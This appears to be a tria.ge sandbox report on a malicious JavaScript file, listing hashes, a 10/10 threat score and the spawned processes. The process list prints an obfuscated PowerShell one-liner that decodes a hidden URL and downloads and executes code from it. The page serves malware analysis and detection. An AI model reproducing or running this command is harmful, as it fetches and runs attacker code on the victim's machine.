Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

_rnnsnn.js

windows7-x64

10

_rnnsnn.js

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    22/08/2024, 01:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    _rnnsnn.js

  • Size

    118KB

  • MD5

    5068d584bdd33473911ffac1e3d66a38

  • SHA1

    f66ff36a55ca2d51fe5ca1d88404542833873803

  • SHA256

    c58c00c228cca6f542d90ae389bab8f0455917fd5e4bc396991d40d22cbb8448

  • SHA512

    6311473e7c39be2092aa8f0edec141d17613f95493e8e35df209b71b364e024589a77d9a74e2afae5cb10b16639112121257806855d214686196d92725fa862e

  • SSDEEP

    3072:L1VTo57Y8J7tcwIgwFyBuLn7zMv1z6WEbTScZhCft/:L3o5Kzg077zQm5fRP0d

Score
10/10
execution

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\_rnnsnn.js
    1⤵
      PID:1296
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell $nemmbxede='ur';new-alias press c$($nemmbxede)l;$gmmurlxkvz=(6091,6079,6076,6094,6084,6097,6084,6101,6084,6080,6025,6095,6090,6091,6026,6028,6025,6091,6083,6091,6042,6094,6040,6088,6084,6089,6095,6094,6028,6030);$mrujgi=('bronx','get-cmdlet');$izttnhcn=$gmmurlxkvz;foreach($fssifukxy in $izttnhcn){$lrdpln=$fssifukxy;$iwsbbhtrf=$iwsbbhtrf+[char]($lrdpln-5979);$hgndvrz=$iwsbbhtrf;$xrovqwj=$hgndvrz};$gyqmidwxo[2]=$xrovqwj;$uuwoxs='rl';$brrikgly=1;.$([char](9992-9887)+'e'+'x')(press -useb $xrovqwj)
      1⤵
      • Process spawned unexpected child process
      PID:2500

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads